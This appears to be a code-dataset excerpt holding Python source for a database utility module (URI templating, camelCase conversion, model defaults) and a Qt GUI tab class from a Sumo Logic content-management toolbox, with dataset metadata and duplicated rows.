new_key += "_" + char.lower()
else:
new_key += char
if new_key.startswith("_"):
new_key = new_key[1:]
return new_key
def get_model_defaults(cls):
"""
This function receives a model class and returns the default values
for the class in the form of a dict.
If the default value is a function, the function will be executed. This is meant for simple functions such as datetime and uuid.
Args:
cls: (obj) : A Model class.
Returns:
defaults: (dict) : A dictionary of the default values.
"""
tmp = {}
for key in cls.__dict__.keys():
col = cls.__dict__[key]
if hasattr(col, "expression"):
if col.expression.default is not None:
arg = col.expression.default.arg
if callable(arg):
tmp[key] = arg(cls.db)
else:
tmp[key] = arg
return tmp
| # dbbase/utils.py
"""
This module implements some utilities.
"""
import string
import json
import logging
logger = logging.getLogger(__file__)
def db_config(base, config_vars=None):
"""
This function combines config variables with a base string.
It is a convenience function for combining data elements
to make a string that represents a database URI.
Default:
db_config(base, config_vars=None)
Args:
base: (str) : a string that is the db template, such as
`"postgresql://{user}:{pass}@{host}:{port}/{dbname}"`
config_vars: (dict) : variables that will be combined with the base.
For example:
'user': 'auser',
'pass': '<PASSWORD>',
'host': 'localhost',
'port': 5432,
'dbname': 'mydatadb'
config_vars can also be a string that successfully converts from JSON
to a dict.
This enables a config to be as simplistic or complex as the situation
warrants.
Returns:
completed_URI (str) : the database URI
"""
if config_vars is None:
config_vars = {}
if isinstance(config_vars, str):
# try to convert from json
config_vars = json.loads(config_vars)
if isinstance(config_vars, dict):
return base.format(**config_vars)
return base
def _is_sqlite(config):
"""_is_sqlite
Default:
_is_sqlite(config)
returns True if config contains the string sqlite
returns True if config contains :memory:
"""
if config.find("sqlite") > -1:
return True
if config.find(":memory:") > -1:
return True
return False
def xlate(key, camel_case=True):
"""
This function translates a name to camel case or back.
Default:
xlate(key, camel_case=True)
Example:
camel_case is True:
start_date would become startDate
startdate would remain startdate
camel_case is False:
startDate would become start_date
startdate would remain startdate
Args:
key: (str) : the key that would be converted
camel_case: (bool) : True to convert to camel case
Returns:
key (str) : the converted string
"""
if camel_case:
return _xlate_camel_case(key)
return _xlate_from_camel_case(key)
def _xlate_camel_case(key):
"""Convert example: start_date -> startDate """
if key.find("_") > -1:
key = string.capwords(key.replace("_", " ")).replace(" ", "")
key = key[0].lower() + key[1:]
return key
def _xlate_from_camel_case(key):
"""Convert example: startDate -> start_date """
new_key = ""
for char in key:
if char in string.ascii_uppercase:
new_key += "_" + char.lower()
else:
new_key += char
if new_key.startswith("_"):
new_key = new_key[1:]
return new_key
def get_model_defaults(cls):
"""
This function receives a model class and returns the default values
for the class in the form of a dict.
If the default value is a function, the function will be executed. This is meant for simple functions such as datetime and uuid.
Args:
cls: (obj) : A Model class.
Returns:
defaults: (dict) : A dictionary of the default values.
"""
tmp = {}
for key in cls.__dict__.keys():
col = cls.__dict__[key]
if hasattr(col, "expression"):
if col.expression.default is not None:
arg = col.expression.default.arg
if callable(arg):
tmp[key] = arg(cls.db)
else:
tmp[key] = arg
return tmp
| en | 0.683343 | # dbbase/utils.py This module implements some utilities. This function combines config variables with a base string. It is a convenience function for combining data elements to make a string that represents a database URI. Default: db_config(base, config_vars=None) Args: base: (str) : a string that is the db template, such as `"postgresql://{user}:{pass}@{host}:{port}/{dbname}"` config_vars: (dict) : variables that will be combined with the base. For example: 'user': 'auser', 'pass': '<PASSWORD>', 'host': 'localhost', 'port': 5432, 'dbname': 'mydatadb' config_vars can also be a string that successfully converts from JSON to a dict. This enables a config to be as simplistic or complex as the situation warrants. Returns: completed_URI (str) : the database URI # try to convert from json _is_sqlite Default: _is_sqlite(config) returns True if config contains the string sqlite returns True if config contains :memory: This function translates a name to camel case or back. Default: xlate(key, camel_case=True) Example: camel_case is True: start_date would become startDate startdate would remain startdate camel_case is False: startDate would become start_date startdate would remain startdate Args: key: (str) : the key that would be converted camel_case: (bool) : True to convert to camel case Returns: key (str) : the converted string Convert example: start_date -> startDate Convert example: startDate -> start_date This function receives a model class and returns the default values for the class in the form of a dict. If the default value is a function, the function will be executed. This is meant for simple functions such as datetime and uuid. Args: cls: (obj) : A Model class. Returns: defaults: (dict) : A dictionary of the default values. | 3.276829 | 3 |
modules/tab_base_class.py | voltaire321/sumologictoolbox | 24 | 6616715 | <gh_stars>10-100
from qtpy import QtCore, QtGui, QtWidgets, uic
from modules.multithreading import Worker, ProgressDialog
from modules.shared import ShowTextDialog, exception_and_error_handling
from modules.filesystem_adapter import FilesystemAdapter
import pathlib
import json
import re
import os
from logzero import logger
class_name = 'baseTab'
class FindReplaceCopyDialog(QtWidgets.QDialog):
def __init__(self, fromcategories, tocategories, parent=None):
super(FindReplaceCopyDialog, self).__init__(parent)
self.objectlist = []
self.setup_ui(self, fromcategories, tocategories)
def setup_ui(self, Dialog, fromcategories, tocategories):
# setup static elements
Dialog.setObjectName("FindReplaceCopy")
Dialog.setMinimumWidth(700)
Dialog.setWindowTitle('Dynamically Replace Source Category Strings')
QBtn = QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel
self.buttonBox = QtWidgets.QDialogButtonBox(QBtn)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
# set up the list of destination categories to populate into the comboboxes
itemmodel = QtGui.QStandardItemModel()
for tocategory in tocategories:
text_item = QtGui.QStandardItem(str(tocategory))
itemmodel.appendRow(text_item)
itemmodel.sort(0)
self.layoutSelections = QtWidgets.QGridLayout()
self.labelReplace = QtWidgets.QLabel()
self.labelReplace.setText("Replace")
self.layoutSelections.addWidget(self.labelReplace, 0, 0)
self.labelOriginal = QtWidgets.QLabel()
self.labelOriginal.setText("Original Source Category")
self.layoutSelections.addWidget(self.labelOriginal, 0, 1)
self.labelReplaceWith = QtWidgets.QLabel()
self.labelReplaceWith.setText("With:")
self.layoutSelections.addWidget(self.labelReplaceWith, 0, 2)
# Create 1 set of (checkbox, label, combobox per fromcategory
for index, fromcategory in enumerate(fromcategories):
objectdict = {'checkbox': None, 'label': None, 'combobox': None}
objectdict['checkbox'] = QtWidgets.QCheckBox()
objectdict['checkbox'].setObjectName("checkBox" + str(index))
objectdict['checkbox'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['checkbox'], index + 1, 0)
objectdict['label']= QtWidgets.QLabel()
objectdict['label'].setObjectName("comboBox" + str(index))
objectdict['label'].setText(fromcategory)
objectdict['label'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['label'], index + 1, 1)
objectdict['combobox'] = QtWidgets.QComboBox()
objectdict['combobox'].setObjectName("comboBox" + str(index))
objectdict['combobox'].setModel(itemmodel)
objectdict['combobox'].setEditable(True)
objectdict['combobox'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['combobox'], index + 1, 2)
self.objectlist.append(objectdict)
self.groupBox = QtWidgets.QGroupBox()
self.groupBox.setLayout(self.layoutSelections)
# Creata a vertical scroll area with a grid layout inside with label headers
self.scrollArea = QtWidgets.QScrollArea()
self.scrollArea.setWidget(self.groupBox)
self.scrollArea.setWidgetResizable(True)
#self.scrollArea.setFixedHeight(400)
self.scrollArea.setMaximumHeight(500)
self.scrollArea.setMinimumWidth(700)
self.layout = QtWidgets.QVBoxLayout()
self.layout.addWidget(self.scrollArea)
self.layout.addWidget(self.buttonBox)
self.setLayout(self.layout)
def getresults(self):
results = []
for object in self.objectlist:
if str(object['checkbox'].checkState()) == '2':
objectdata = { 'from': str(object['label'].text()), 'to': str(object['combobox'].currentText())}
results.append(objectdata)
return results
class BaseTab(QtWidgets.QWidget):
def __init__(self, mainwindow):
super(BaseTab, self).__init__()
self.mainwindow = mainwindow
self.tab_name = 'Base'
self.cred_usage = 'both'
# Override the font
self.font = "Waree"
self.font_size = 12
# things needed for multithreading
self.workers = []
self.num_successful_threads = 0
self.load_icons()
def reset_stateful_objects(self, side='both'):
self.left = None
self.right = None
if side == 'both':
self.left = True
self.right = True
if side == 'left':
self.left = True
self.right = False
if side == 'right':
self.left = False
self.right = True
self.left_creds = self.mainwindow.get_current_creds('left')
self.right_creds = self.mainwindow.get_current_creds('right')
def load_icons(self):
self.icons = {}
icon_path = str(pathlib.Path(self.mainwindow.basedir + '/data/folder.svg'))
self.icons['Folder'] = QtGui.QIcon(icon_path)
def set_listwidget_filter(self, list_widget, filter_text):
for row in range(list_widget.count()):
item = list_widget.item(row)
if filter_text:
item.setHidden(not filter_text in item.text())
else:
item.setHidden(False)
# Thanks Stackoverflow. Yoink!
def find_keys(self, obj, key):
"""Pull all values of specified key from nested JSON."""
arr = []
def extract(obj, arr, key):
"""Recursively search for values of key in JSON tree."""
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
extract(v, arr, key)
elif k == key:
arr.append(v)
elif isinstance(obj, list):
for item in obj:
extract(item, arr, key)
return arr
results = extract(obj, arr, key)
return results
def _find_replace_specific_key_and_value(self, obj, key, old_value, new_value):
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
obj[k] = self._find_replace_specific_key_and_value(v, key, old_value, new_value)
elif k == key and v == old_value:
obj[k] = new_value
elif isinstance(obj, list):
for index, item in enumerate(obj):
obj[index] = self._find_replace_specific_key_and_value(item, key, old_value, new_value)
return obj
def recurse_replace_query_strings(self, query_string_replacement_list, exported_json):
if exported_json['type'] == "SavedSearchWithScheduleSyncDefinition":
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in exported_json['search']['queryText']:
exported_json['search']['queryText'] = exported_json['search']['queryText'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
return exported_json
elif exported_json['type'] == "DashboardSyncDefinition":
for panelnum, panel in enumerate(exported_json['panels'], start=0):
if panel['viewerType'] == "metrics": # there can be multiple query strings so we have an extra loop here
for querynum, metrics_query in enumerate(panel['metricsQueries'], start=0):
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in metrics_query['query']:
metrics_query['query'] = metrics_query['query'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
panel['metricsQueries'][querynum] = metrics_query
else: # if panel is a log panel
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in panel['queryString']:
panel['queryString'] = panel['queryString'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
exported_json['panels'][panelnum] = panel
return exported_json
elif exported_json['type'] == "DashboardV2SyncDefinition": # if it's a new style dashboard
for panelnum, panel in enumerate(exported_json['panels'], start=0):
for querynum, query in enumerate(panel['queries']):
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in query['queryString']:
query['queryString'] = query['queryString'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
panel['queries'][querynum] = query
exported_json['panels'][panelnum] = panel
return exported_json
elif exported_json['type'] == "FolderSyncDefinition":
children = []
for object in exported_json['children']:
children.append(self.recurse_replace_query_strings(query_string_replacement_list, object))
exported_json['children'] = children
return exported_json
def clear_filters(self, list_widget):
pass
@exception_and_error_handling
def update_item_list(self, list_widget, adapter, path_label=None):
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
contents = adapter.list(params=merged_params)
logger.debug(f'[Tab Base Class] Updating item list, got: {contents}')
self.update_list_widget(list_widget, adapter, contents, path_label=path_label)
self.clear_filters(list_widget)
def create_list_widget_item(self, item):
item_name = str(item['name'])
if ('contentType' in item) and (item['contentType'] == 'Folder'):
list_item = QtWidgets.QListWidgetItem(self.icons['Folder'], item_name)
elif ('itemType' in item) and (item['itemType'] == 'Folder'):
list_item = QtWidgets.QListWidgetItem(self.icons['Folder'], item_name)
else:
list_item = QtWidgets.QListWidgetItem(item_name)
return list_item
def update_list_widget(self, list_widget, adapter, payload, path_label=None):
try:
list_widget.clear()
count = 0
for item in payload:
list_item = self.create_list_widget_item(item)
# attach the details about the item to the entry in listwidget, this makes life much easier
list_item.details = item
list_widget.addItem(list_item) # populate the list widget in the GUI with no icon (fallthrough)
count += 1
if path_label:
path_label.setText(adapter.get_current_path())
list_widget.updated = True
except Exception as e:
list_widget.clear()
list_widget.updated = False
logger.exception(e)
return
@exception_and_error_handling
def find_replace_metadata(self, adapter, payload):
logger.debug(f"[{self.tab_name}] Replacing Metadata")
source_metadata = []
for item in payload:
# find all the keys in our item that contain queries
query_list = self.find_keys(item, 'queryText')
query_list = query_list + self.find_keys(item, 'query')
query_list = query_list + self.find_keys(item, 'queryString')
# extract the source category from our list of queries
for query in query_list:
source_metadata = source_metadata + re.findall(r'_sourceCategory\s*=\s*\\?\"?([^\s^")]*)\"?',
query)
# de-duplicate the list of source categories
unique_source_metadata = list(set(source_metadata))
# if the destination is a Sumo Instance then query for available metadata tags
if adapter.is_sumo_adapter():
fromtime = str(QtCore.QDateTime.currentDateTime().addSecs(-3600).toString(QtCore.Qt.ISODate))
totime = str(QtCore.QDateTime.currentDateTime().toString(QtCore.Qt.ISODate))
# We query the destination org to get a sample of active source categories
query = r'* | count by _sourceCategory | fields _sourceCategory'
results = adapter.sumo_search_records(query, from_time=fromtime, to_time=totime,
timezone='UTC', by_receipt_time=False)
records = results['payload']
destination_metadata = []
for record in records:
logger.debug(f'Found Source Category:{record}')
destination_metadata.append(record['map']['_sourcecategory'])
unique_destination_metadata = list(set(destination_metadata))
# if the destination is not a Sumo instance then leave the destination metadata tag list empty
else:
unique_destination_metadata = []
dialog = FindReplaceCopyDialog(unique_source_metadata, unique_destination_metadata)
dialog.exec()
dialog.show()
if str(dialog.result()) == '1':
replacelist = dialog.getresults()
logger.debug(f'Metadata replacement list: {replacelist}')
dialog.close()
if len(replacelist) > 0:
new_payload = []
for item in payload:
new_payload.append(self.recurse_replace_query_strings(replacelist, item))
else:
new_payload = payload
return new_payload
else:
return []
@exception_and_error_handling
def begin_copy_content(self,
source_list_widget,
destination_list_widget,
source_adapter,
destination_adapter,
params):
selected_items = source_list_widget.selectedItems()
num_selected_items = len(selected_items)
if num_selected_items < 1: return # make sure something was selected
logger.debug(f"[{self.tab_name}] Exporting Item(s) {selected_items}")
self.num_threads = num_selected_items
self.num_successful_threads = 0
self.copy_export_results = []
self.export_progress = ProgressDialog('Exporting items...', 0, self.num_threads, self.mainwindow.threadpool, self.mainwindow)
self.workers = []
base_params = {'destination_list_widget': destination_list_widget,
'destination_adapter': destination_adapter,
'read_mode': source_list_widget.mode,
'write_mode': destination_list_widget.mode}
merged_params = {**base_params, **params}
merged_params = {**merged_params, **source_list_widget.params}
for index, selected_item in enumerate(selected_items):
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating copy thread for item {selected_item.details['name']}")
self.workers.append(Worker(source_adapter.export_item,
selected_item.details['name'],
item_id,
params=merged_params
))
self.workers[index].signals.finished.connect(self.export_progress.increment)
self.workers[index].signals.result.connect(self.merge_begin_copy_results)
self.mainwindow.threadpool.start(self.workers[index])
return
def merge_begin_copy_results(self, result):
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
self.copy_export_results.append(result['payload'])
else:
self.mainwindow.threadpool.clear()
logger.info(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
if result['params']['replace_source_categories']:
item_list = self.find_replace_metadata(result['params']['destination_adapter'], self.copy_export_results)
else:
item_list = self.copy_export_results
if len(item_list) == 0: return
logger.debug(f"[{self.tab_name}] Importing Item(s)")
self.num_threads = len(item_list)
self.num_successful_threads = 0
self.copy_export_results = []
self.import_progress = ProgressDialog('Importing items...', 0, self.num_threads, self.mainwindow.threadpool,
self.mainwindow)
self.workers = []
for index, item in enumerate(item_list):
if 'name' in item:
logger.debug(f"Creating copy thread for item {item['name']}")
self.workers.append(Worker(result['params']['destination_adapter'].import_item,
item['name'],
item,
params=result['params']
))
self.workers[index].signals.finished.connect(self.import_progress.increment)
self.workers[index].signals.result.connect(self.merge_results_update_target)
self.mainwindow.threadpool.start(self.workers[index])
def merge_results_update_target(self, result):
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
else:
self.mainwindow.threadpool.clear()
logger.info(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
self.update_item_list(result['params']['destination_list_widget'], result['adapter'])
@exception_and_error_handling
def delete_item(self, list_widget, adapter):
selected_items = list_widget.selectedItems()
if len(selected_items) < 1: return # make sure something was selected
logger.debug(f"[{self.tab_name}] Deleting Item(s) {selected_items}")
message = "You are about to delete the following item(s):\n\n"
for selected_item in selected_items:
message = message + str(selected_item.text()) + "\n"
message = message + '''
This is exceedingly DANGEROUS!!!!
Please be VERY, VERY, VERY sure you want to do this!
You could lose quite a bit of work if you delete the wrong thing(s).
If you are absolutely sure, type "DELETE" in the box below.
'''
text, result = QtWidgets.QInputDialog.getText(self, 'Warning!!', message)
if (result and (str(text) == 'DELETE')):
self.num_threads = len(selected_items)
self.num_successful_threads = 0
self.progress = ProgressDialog('Deleting items...', 0, self.num_threads, self.mainwindow.threadpool,
self.mainwindow)
self.workers = []
params = {'destination_list_widget': list_widget,
'destination_adapter': adapter,
'mode': list_widget.mode}
for index, selected_item in enumerate(selected_items):
item_name = selected_item.details['name']
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating delete thread for item {item_name}")
self.workers.append(Worker(adapter.delete,
item_name,
item_id,
params=params))
self.workers[index].signals.finished.connect(self.progress.increment)
self.workers[index].signals.result.connect(self.merge_results_update_target)
self.mainwindow.threadpool.start(self.workers[index])
@exception_and_error_handling
def view_json(self, list_widget, adapter):
selected_items = list_widget.selectedItems()
if len(selected_items) < 1: return # make sure something was selected
logger.debug(f"[Content] Viewing JSON {selected_items}")
self.num_threads = len(selected_items)
self.num_successful_threads = 0
self.progress = ProgressDialog('Viewing items...', 0, self.num_threads, self.mainwindow.threadpool, self.mainwindow)
self.json_text = ''
self.workers = []
params = {'read_mode': list_widget.mode,
'list_widget': list_widget}
for index, selected_item in enumerate(selected_items):
item_name = selected_item.details['name']
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating view thread for item {item_name}")
self.workers.append(Worker(adapter.get,
item_name,
item_id,
params=params))
self.workers[index].signals.finished.connect(self.progress.increment)
self.workers[index].signals.result.connect(self.merge_view_json_results)
self.mainwindow.threadpool.start(self.workers[index])
def merge_view_json_results(self, result):
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
self.json_text = self.json_text + json.dumps(result['payload'], indent=4, sort_keys=True) + '\n\n'
else:
self.mainwindow.threadpool.clear()
logger.info(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
self.json_window = ShowTextDialog('JSON', self.json_text, self.mainwindow.basedir)
self.json_window.show()
@exception_and_error_handling
def create_folder(self, list_widget, adapter):
if list_widget.updated:
message = '''
Please enter the name of the folder you wish to create:
'''
text, result = QtWidgets.QInputDialog.getText(self, 'Create Folder...', message)
if result:
for item in list_widget.selectedItems():
if item.details['name'] == str(text):
self.mainwindow.errorbox('That Directory Name Already Exists!')
return False
logger.debug(f"[{self.tab_name}] Creating New Folder {str(text)}")
params = {'mode': list_widget.mode}
result = adapter.create_folder(str(text), list_widget, params=params)
if result:
self.update_item_list(list_widget, adapter)
return True
else:
return False
@exception_and_error_handling
def double_clicked_item(self, list_widget, adapter, item, path_label=None):
logger.debug(f"[{self.tab_name}] Going Down One Folder {str(item.details['name'])}")
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
result = adapter.down(item.details['name'], params=merged_params)
if result:
self.update_item_list(list_widget, adapter, path_label=path_label)
@exception_and_error_handling
def go_to_parent_dir(self, list_widget, adapter, path_label=None):
if list_widget.updated:
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
result = adapter.up(params=merged_params)
if result:
logger.debug(f"[{self.tab_name}] Going Up One folder")
self.update_item_list(list_widget, adapter, path_label=path_label)
class StandardTab(BaseTab):
def __init__(self, mainwindow, copy_override=False):
super(StandardTab, self).__init__(mainwindow)
standard_tab_ui = os.path.join(self.mainwindow.basedir, 'data/standard_tab.ui')
uic.loadUi(standard_tab_ui, self)
self.listWidgetLeft.filter = self.lineEditSearchLeft
self.listWidgetRight.filter = self.lineEditSearchRight
self.pushButtonUpdateLeft.clicked.connect(lambda: self.update_item_list(
self.listWidgetLeft,
self.left_adapter,
path_label=self.labelPathLeft
))
self.pushButtonUpdateRight.clicked.connect(lambda: self.update_item_list(
self.listWidgetRight,
self.right_adapter,
path_label=self.labelPathRight
))
self.pushButtonParentDirLeft.clicked.connect(lambda: self.go_to_parent_dir(
self.listWidgetLeft,
self.left_adapter,
path_label=self.labelPathLeft
))
self.pushButtonParentDirRight.clicked.connect(lambda: self.go_to_parent_dir(
self.listWidgetRight,
self.right_adapter,
path_label=self.labelPathRight
))
self.lineEditSearchLeft.textChanged.connect(lambda: self.set_listwidget_filter(
self.listWidgetLeft,
self.lineEditSearchLeft.text()
))
self.lineEditSearchRight.textChanged.connect(lambda: self.set_listwidget_filter(
self.listWidgetRight,
self.lineEditSearchRight.text()
))
self.listWidgetLeft.itemDoubleClicked.connect(lambda item: self.double_clicked_item(
self.listWidgetLeft,
self.left_adapter,
item,
path_label=self.labelPathLeft
))
self.listWidgetRight.itemDoubleClicked.connect(lambda item: self.double_clicked_item(
self.listWidgetRight,
self.right_adapter,
item,
path_label=self.labelPathRight
))
self.pushButtonNewFolderLeft.clicked.connect(lambda: self.create_folder(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonNewFolderRight.clicked.connect(lambda: self.create_folder(
self.listWidgetRight,
self.right_adapter
))
self.pushButtonDeleteLeft.clicked.connect(lambda: self.delete_item(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonDeleteRight.clicked.connect(lambda: self.delete_item(
self.listWidgetRight,
self.right_adapter
))
if not copy_override:
self.pushButtonCopyLeftToRight.clicked.connect(lambda: self.begin_copy_content(
self.listWidgetLeft,
self.listWidgetRight,
self.left_adapter,
self.right_adapter,
{'replace_source_categories': False}
))
self.pushButtonCopyRightToLeft.clicked.connect(lambda: self.begin_copy_content(
self.listWidgetRight,
self.listWidgetLeft,
self.right_adapter,
self.left_adapter,
{'replace_source_categories': False}
))
self.pushButtonJSONLeft.clicked.connect(lambda: self.view_json(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonJSONRight.clicked.connect(lambda: self.view_json(
self.listWidgetRight,
self.right_adapter
))
def clear_filters(self, list_widget):
list_widget.filter.clear()
def reset_stateful_objects(self, side='both'):
super(StandardTab, self).reset_stateful_objects(side=side)
if self.left:
self.listWidgetLeft.clear()
self.listWidgetLeft.currentcontent = {}
self.listWidgetLeft.updated = False
self.listWidgetLeft.mode = None
self.labelPathLeft.clear()
self.lineEditSearchLeft.clear()
if self.left_creds['service'] == "FILESYSTEM:":
self.pushButtonParentDirLeft.setEnabled(True)
self.pushButtonNewFolderLeft.setEnabled(True)
self.left_adapter = FilesystemAdapter(self.left_creds, 'left', self.mainwindow)
elif ':' not in self.left_creds['service']:
self.pushButtonParentDirLeft.setEnabled(False)
self.pushButtonNewFolderLeft.setEnabled(False)
if self.right:
self.listWidgetRight.clear()
self.listWidgetRight.currentcontent = {}
self.listWidgetRight.updated = False
self.listWidgetRight.mode = None
self.labelPathRight.clear()
self.lineEditSearchRight.clear()
if self.right_creds['service'] == "FILESYSTEM:":
self.pushButtonParentDirRight.setEnabled(True)
self.pushButtonNewFolderRight.setEnabled(True)
self.right_adapter = FilesystemAdapter(self.right_creds, 'right', self.mainwindow)
if ':' not in self.right_creds['service']:
self.pushButtonParentDirRight.setEnabled(False)
self.pushButtonNewFolderRight.setEnabled(False)
| from qtpy import QtCore, QtGui, QtWidgets, uic
from modules.multithreading import Worker, ProgressDialog
from modules.shared import ShowTextDialog, exception_and_error_handling
from modules.filesystem_adapter import FilesystemAdapter
import pathlib
import json
import re
import os
from logzero import logger
class_name = 'baseTab'
class FindReplaceCopyDialog(QtWidgets.QDialog):
def __init__(self, fromcategories, tocategories, parent=None):
super(FindReplaceCopyDialog, self).__init__(parent)
self.objectlist = []
self.setup_ui(self, fromcategories, tocategories)
def setup_ui(self, Dialog, fromcategories, tocategories):
# setup static elements
Dialog.setObjectName("FindReplaceCopy")
Dialog.setMinimumWidth(700)
Dialog.setWindowTitle('Dynamically Replace Source Category Strings')
QBtn = QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel
self.buttonBox = QtWidgets.QDialogButtonBox(QBtn)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
# set up the list of destination categories to populate into the comboboxes
itemmodel = QtGui.QStandardItemModel()
for tocategory in tocategories:
text_item = QtGui.QStandardItem(str(tocategory))
itemmodel.appendRow(text_item)
itemmodel.sort(0)
self.layoutSelections = QtWidgets.QGridLayout()
self.labelReplace = QtWidgets.QLabel()
self.labelReplace.setText("Replace")
self.layoutSelections.addWidget(self.labelReplace, 0, 0)
self.labelOriginal = QtWidgets.QLabel()
self.labelOriginal.setText("Original Source Category")
self.layoutSelections.addWidget(self.labelOriginal, 0, 1)
self.labelReplaceWith = QtWidgets.QLabel()
self.labelReplaceWith.setText("With:")
self.layoutSelections.addWidget(self.labelReplaceWith, 0, 2)
# Create 1 set of (checkbox, label, combobox per fromcategory
for index, fromcategory in enumerate(fromcategories):
objectdict = {'checkbox': None, 'label': None, 'combobox': None}
objectdict['checkbox'] = QtWidgets.QCheckBox()
objectdict['checkbox'].setObjectName("checkBox" + str(index))
objectdict['checkbox'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['checkbox'], index + 1, 0)
objectdict['label']= QtWidgets.QLabel()
objectdict['label'].setObjectName("comboBox" + str(index))
objectdict['label'].setText(fromcategory)
objectdict['label'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['label'], index + 1, 1)
objectdict['combobox'] = QtWidgets.QComboBox()
objectdict['combobox'].setObjectName("comboBox" + str(index))
objectdict['combobox'].setModel(itemmodel)
objectdict['combobox'].setEditable(True)
objectdict['combobox'].setSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.layoutSelections.addWidget(objectdict['combobox'], index + 1, 2)
self.objectlist.append(objectdict)
self.groupBox = QtWidgets.QGroupBox()
self.groupBox.setLayout(self.layoutSelections)
# Creata a vertical scroll area with a grid layout inside with label headers
self.scrollArea = QtWidgets.QScrollArea()
self.scrollArea.setWidget(self.groupBox)
self.scrollArea.setWidgetResizable(True)
#self.scrollArea.setFixedHeight(400)
self.scrollArea.setMaximumHeight(500)
self.scrollArea.setMinimumWidth(700)
self.layout = QtWidgets.QVBoxLayout()
self.layout.addWidget(self.scrollArea)
self.layout.addWidget(self.buttonBox)
self.setLayout(self.layout)
def getresults(self):
results = []
for object in self.objectlist:
if str(object['checkbox'].checkState()) == '2':
objectdata = { 'from': str(object['label'].text()), 'to': str(object['combobox'].currentText())}
results.append(objectdata)
return results
class BaseTab(QtWidgets.QWidget):
def __init__(self, mainwindow):
super(BaseTab, self).__init__()
self.mainwindow = mainwindow
self.tab_name = 'Base'
self.cred_usage = 'both'
# Override the font
self.font = "Waree"
self.font_size = 12
# things needed for multithreading
self.workers = []
self.num_successful_threads = 0
self.load_icons()
def reset_stateful_objects(self, side='both'):
self.left = None
self.right = None
if side == 'both':
self.left = True
self.right = True
if side == 'left':
self.left = True
self.right = False
if side == 'right':
self.left = False
self.right = True
self.left_creds = self.mainwindow.get_current_creds('left')
self.right_creds = self.mainwindow.get_current_creds('right')
def load_icons(self):
self.icons = {}
icon_path = str(pathlib.Path(self.mainwindow.basedir + '/data/folder.svg'))
self.icons['Folder'] = QtGui.QIcon(icon_path)
def set_listwidget_filter(self, list_widget, filter_text):
for row in range(list_widget.count()):
item = list_widget.item(row)
if filter_text:
item.setHidden(not filter_text in item.text())
else:
item.setHidden(False)
# Thanks Stackoverflow. Yoink!
def find_keys(self, obj, key):
"""Pull all values of specified key from nested JSON."""
arr = []
def extract(obj, arr, key):
"""Recursively search for values of key in JSON tree."""
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
extract(v, arr, key)
elif k == key:
arr.append(v)
elif isinstance(obj, list):
for item in obj:
extract(item, arr, key)
return arr
results = extract(obj, arr, key)
return results
def _find_replace_specific_key_and_value(self, obj, key, old_value, new_value):
if isinstance(obj, dict):
for k, v in obj.items():
if isinstance(v, (dict, list)):
obj[k] = self._find_replace_specific_key_and_value(v, key, old_value, new_value)
elif k == key and v == old_value:
obj[k] = new_value
elif isinstance(obj, list):
for index, item in enumerate(obj):
obj[index] = self._find_replace_specific_key_and_value(item, key, old_value, new_value)
return obj
def recurse_replace_query_strings(self, query_string_replacement_list, exported_json):
if exported_json['type'] == "SavedSearchWithScheduleSyncDefinition":
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in exported_json['search']['queryText']:
exported_json['search']['queryText'] = exported_json['search']['queryText'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
return exported_json
elif exported_json['type'] == "DashboardSyncDefinition":
for panelnum, panel in enumerate(exported_json['panels'], start=0):
if panel['viewerType'] == "metrics": # there can be multiple query strings so we have an extra loop here
for querynum, metrics_query in enumerate(panel['metricsQueries'], start=0):
